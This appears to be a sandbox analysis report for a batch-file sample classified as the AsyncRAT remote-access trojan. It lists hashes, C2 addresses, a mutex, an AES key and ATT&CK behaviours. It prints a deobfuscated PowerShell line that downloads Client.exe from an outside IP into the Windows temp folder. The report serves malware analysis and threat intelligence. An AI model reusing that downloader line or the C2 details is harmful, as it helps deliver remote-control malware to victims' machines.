General

  • Target

    6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat

  • Size

    7KB

  • Sample

    240806-b7scsszbpf

  • MD5

    90c3dfd74d6ab4b7b98777930ab44a23

  • SHA1

    7f536fa9c3972c4416e8620335e39f9e93092103

  • SHA256

    6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

  • SHA512

    aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92

  • SSDEEP

    12:b4tdk5jtnrC0yyGyDF98oul666666666666HW4xmBWp/CR898U7LtaJO20c1H:b4/otrlyRKubxwWRCRKpJD8H

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("http://20.199.84.103/Client.exe", "C:\\Windows\\Temp\\Client.exe")
2
URLs
exe.dropper

http://20.199.84.103/Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:1024

20.199.84.103:1024

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
xkz50dzLI2BTM2SpCbBbXgX6xP7VcRLe

Targets

    • Target

      6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat

    • Size

      7KB

    • MD5

      90c3dfd74d6ab4b7b98777930ab44a23

    • SHA1

      7f536fa9c3972c4416e8620335e39f9e93092103

    • SHA256

      6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

    • SHA512

      aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92

    • SSDEEP

      12:b4tdk5jtnrC0yyGyDF98oul666666666666HW4xmBWp/CR898U7LtaJO20c1H:b4/otrlyRKubxwWRCRKpJD8H

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers written in C#.

    • Async RAT payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Downloads MZ/PE file

    • Executes dropped EXE

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.